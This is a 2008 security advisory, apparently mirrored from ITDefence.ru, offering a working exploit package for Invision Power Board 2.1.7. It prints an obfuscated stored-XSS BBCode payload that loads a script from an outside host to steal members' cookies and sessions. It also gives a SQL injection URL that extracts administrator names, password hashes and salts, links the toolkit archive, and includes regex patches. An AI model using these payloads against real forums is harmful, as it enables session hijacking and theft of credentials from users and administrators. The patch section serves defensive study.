Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18803
HistoryJan 06, 2008 - 12:00 a.m.

INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT

2008-01-0600:00:00
vulners.com
66

----[ INVISION POWER BOARD 2.1.7 EXPLOIT … ITDefence.ru Antichat.ru ]

                                            INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
                                                    Eugene Minaev [email protected]
                            ___________________________________________________________________
                    ____/  __ __ _______________________ _______  _______________    \  \   \
                    / .\  /  /_// //              /        \       \/      __       \   /__/   /
                    / /     /_//              /\        /       /      /         /     /___/
                    \/        /              / /       /       /\     /         /         /
                    /        /               \/       /       / /    /         /__       //\
                    \       /    ____________/       /        \/    __________// /__    // /   
                    /\\      \_______/        \________________/____/  2007    /_//_/   // //\
                    \ \\                                                               // // /
                    .\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
                    . \_\\________[________________________________________]_________//_//_/ . .
             
            ----[ NITRO ... ]
            
            This vulnerability was already found before, but there was no available 
            public "figting" exploit for it. This POC consists of several parts - active xss

generator,
JS-file, which will be caused at visiting page with xss, log viewer and special component,
which will take necessary data from MySQL forum's tables in case if intercepted session
belonged to the person with moderator privileges.

            ----[ ANALYSIS ... ]
            
            XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss

for
future injetion on the forum board. As the reference it is necessary to specify the full
way
up to ya.js file (in which you have already preliminary corrected way on your own). Most
likely
it is necessary only to press the button.

            [img]http://www.ya.ru/[snapback]       

onerror=script=document.createElement(String.fromCharCode(115,99,114,

105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),

head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]

            The injection can be executed only when there is available session of the user with

access
in moderator's panel.It is necessary to result "starter" parameter to numerical by means
of "intval"
function.In case of successfull injection there is an oppotunity to enumerate forums'
administrators team:

index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*

            ----[ RECORD ... ]
            {
            
                    ---IP ADDRESS   sniffed ip address
                    ---REFERER              xssed theme
                    ---COOKIES              xssed cookies of forum member
                    ---USER ID              xssed user id of forum member
                    ---ADMIN NAME   admin username
                    ---ADMIN PASS   admin pass hash
                    ---ADMIN SALT   admin hash salt
                    
            }
            
            ----[ PATCH ... ]
            
            FILE 
                    sources/classes/bbcode/class_bbcode_core.php
            FUNCTION
                    regex_check_image
            LINE
                    924
            REPLACE
                    if ( preg_match( "/[?&;]/", $url) )
            ON
                    if ( preg_match( "/[?&;\<\[]/", $url) ) 
                    
                    
            FILE
                    sources/classes/bbcode/class_bbcode_core.php
            FUNCTION
                    post_db_parse_bbcode
            LINE
                    486
            REPLACE
                    preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si",

$t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si",
$t, $match );

                    if ( $row['bbcode_tag'] == 'snapback' )
                    {       
                            $match[2][$i] = intval( $match[2][$i] );
                    }  
                    
                    
            
            www.underwater.itdefence.ru/isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]